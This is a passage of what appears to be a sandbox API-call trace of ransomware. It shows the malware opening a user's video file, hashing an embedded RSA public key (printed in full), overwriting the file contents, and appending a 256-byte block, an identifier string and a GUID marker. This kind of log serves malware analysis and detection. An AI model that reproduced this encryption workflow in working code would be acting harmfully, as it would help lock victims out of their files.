hHeap=0x630000) returned 1 [0100.607] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.609] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41fe2af0, ftCreationTime.dwHighDateTime=0x1d5b676, ftLastAccessTime.dwLowDateTime=0x9f59c610, ftLastAccessTime.dwHighDateTime=0x1d5c5de, ftLastWriteTime.dwLowDateTime=0x9f59c610, ftLastWriteTime.dwHighDateTime=0x1d5c5de, nFileSizeHigh=0x0, nFileSizeLow=0xcaa6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XAmJunRYy2WXWqujiyt.mkv", cAlternateFileName="XAMJUN~1.MKV")) returned 1 [0100.609] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAmJunRYy2WXWqujiyt.mkv") returned=".mkv" [0100.609] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAmJunRYy2WXWqujiyt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xamjunryy2wxwqujiyt.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.609] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=51878) returned 1 [0100.609] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.613] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xca80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.613] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.615] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.615] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xcaa6, lpOverlapped=0x0) returned 1 [0100.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.616] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.617] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.617] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.617] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.617] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.617] GetLastError () returned 0x0 [0100.617] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.617] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.617] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.617] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.617] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xcab0) returned 0x9ba8d90 [0100.618] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c8e0 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5860 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.619] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.619] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7db8 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7da0 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.619] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.620] GetCurrentThreadId () returned 0x42c [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7198 [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.621] GetCurrentThreadId () returned 0x42c [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7dd0 [0100.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5860 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.626] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0xcaa1, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xcaa1, lpOverlapped=0x0) returned 1 [0100.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.626] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xcaa6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.627] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.627] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.627] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.627] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.627] CloseHandle (hObject=0x5cc) returned 1 [0100.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 